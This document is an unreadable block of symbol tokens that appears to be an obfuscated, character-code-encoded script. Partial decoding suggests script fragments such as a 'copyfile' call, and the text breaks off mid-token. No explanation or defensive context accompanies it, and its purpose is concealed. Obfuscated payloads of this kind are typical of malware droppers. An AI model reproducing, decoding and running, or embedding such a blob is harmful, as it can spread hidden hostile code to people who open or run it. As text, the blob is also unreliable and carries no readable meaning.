@B‰@N‰@D‰@A‰@N‰@D‰@?‰@N‰@E‰@?‰@N‰@D‰@B‰@N‰@C‰@C‰@N‰@B‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@=‰@A‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@@‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@F‰@F‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@?‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@E‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@E‰@@‰@N‰@>‰@>‰@?‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@@‰@E‰@N‰@D‰@?‰@N‰@B‰@B‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@?‰@N‰@A‰@C‰@N‰@E‰@=‰@N‰@F‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@C‰@D‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@A‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@E‰@@‰@N‰@>‰@>‰@D‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@C‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@E‰@=‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@=‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@F‰@F‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@F‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@B‰@?‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@F‰@N‰@A‰@=‰@N‰@B‰@D‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@A‰@C‰@N‰@>‰@>‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@=‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@C‰@>‰@N‰@>‰@>‰@F‰@N‰@A‰@C‰@N‰@>‰@>‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@=‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@E‰@N‰@E‰@A‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@D‰@E‰@N‰@>‰@>‰@>‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@>‰@=‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@D‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@A‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@D‰@D‰@N‰@>‰@=‰@B‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@C‰@N‰@A‰@C‰@N‰@D‰@E‰@N‰@C‰@F‰@N‰@E‰@A‰@N‰@F‰@?‰@N‰@D‰@=‰@N‰@>‰@>‰@A‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@D‰@N‰@F‰@?‰@N‰@>‰@>‰@E‰@N‰@B‰@=‰@N‰@A‰@C‰@N‰@A‰@E‰@N‰@A‰@C‰@N‰@B‰@@‰@N‰@A‰@E‰@N‰@B‰@B‰@N‰@B‰@=‰@N‰@B‰@B‰@N‰@F‰@?‰@N‰@>‰@>‰@E‰@N‰@F‰@E‰@N‰@F‰@F‰@N‰@A‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@E‰@N‰@E‰@A‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@E‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@>‰@=‰@=‰@N‰@A‰@=‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@=‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@B‰@E‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@E‰@A‰@N‰@E‰@?‰@N‰@E‰@B‰@N‰@C‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@E‰@B‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@@‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@B‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@D‰@=‰@N‰@C‰@B‰@N‰@D‰@C‰@N‰@E‰@@‰@N‰@C‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@E‰@B‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@@‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@>‰@?‰@A‰@N‰@E‰@C‰@N‰@>‰@?‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@E‰@=‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@A‰@A‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@E‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@F‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@F‰@D‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@F‰@D‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@?‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@E‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@@‰@?‰@N‰@B‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@?‰@N‰@D‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@F‰@N‰@>‰@>‰@?‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@F‰@?‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@E‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@B‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@>‰@=‰@=‰@N‰@C‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@F‰@F‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@A‰@A‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@E‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@=‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@A‰@A‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@E‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@A‰@C‰@N‰@F‰@F‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@?‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@E‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@B‰@=‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰